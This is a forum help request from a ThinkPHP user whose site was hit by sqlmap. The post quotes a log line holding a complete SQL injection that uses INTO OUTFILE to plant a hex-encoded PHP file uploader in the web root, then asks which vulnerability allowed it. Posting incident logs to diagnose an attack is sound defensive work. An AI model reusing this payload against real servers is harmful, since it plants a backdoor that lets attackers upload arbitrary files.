网站被sqlmap/1.2.3.8#dev+注入

浏览:1024 发布日期:2018/09/01 分类:ThinkPHP5专区 关键字: 安全 注入 漏洞
版本:THINKPHP 5.0.15
====================
注入代码:
2018-08-31 14:30:56 **************** GET /index/index/thread/ id=56%29%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27D%3A%2Fweb%2Ffastadmin%2Fpublic%2Ftmpupzwd.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d443a5c5c7765625c5c6661737461646d696e5c5c7075626c69635c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--%20%20AND%20%282092%3D2092 80 - 122.233.179.233 sqlmap/1.2.3.8#dev+(http://sqlmap.org) 200 0 0 187
生成了文件:tmpupzwd.php
======================
求助,这属于什么地方的漏洞。
最佳答案
评论( 相关
后面还有条评论,点击查看>>